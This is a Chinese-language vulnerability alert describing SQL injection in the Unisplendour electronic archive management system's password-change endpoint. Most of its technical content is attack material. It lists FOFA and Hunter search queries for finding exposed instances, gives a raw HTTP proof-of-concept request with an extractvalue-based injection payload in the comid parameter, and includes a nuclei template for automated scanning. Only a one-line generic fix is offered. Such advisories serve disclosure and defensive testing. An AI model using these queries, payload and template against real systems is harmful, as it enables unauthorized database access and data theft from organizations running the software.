【漏洞情报 | 新】紫光电子档案管理系统SQL注入

免责声明

文章所涉及内容，仅供安全研究与教学之用，由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

产品简介

紫光电子档案管理系统是清华紫光在多年档案项目产品研发的基础上，于2015年推出的新一代互联网架构的电子档案系统。遵循国家档案管理标准，结合先进的信息化管理理念，使用领先的互联网云计算（J2EE+PHP）的技术框架，和采用流行的网络UE设计优化用户体验，可为企业快速构建高质量的先进性、安全性、前瞻性的综合档案管理平台。

漏洞描述

由于紫光电子档案管理系统的密码修改接口/login/Login/editPass.html存在可控传参过滤逻辑不严，可造成恶意SQL语句的拼接执行，造成SQL注入。

网络测绘

favicon图标特征FOFA网络测绘搜索

app="紫光档案管理系统"

鹰图Hunter网络测绘搜索

app.name="紫光档案管理系统"

漏洞复现

POC：

GET /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Android 10; Mobile; rv:108.0) Gecko/108.0 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

nuclei验证POC模板

id: ziguang_danganmanage_system
info:
  name: ziguang_danganmanage_system
  author: joyboy
  severity: critical
  description: http://xxx.xxx.xxx/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
  metadata:
    max-request: 1
    fofa-query: app="紫光档案管理系统"
    verified: true
  tags: injection,ziguang_danganmanage_system

requests:
  - raw:
      - |-
        GET /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body), "select")'

修复方案

及时更新到最新版本或根据情况联系供应商获得最佳的修复方案。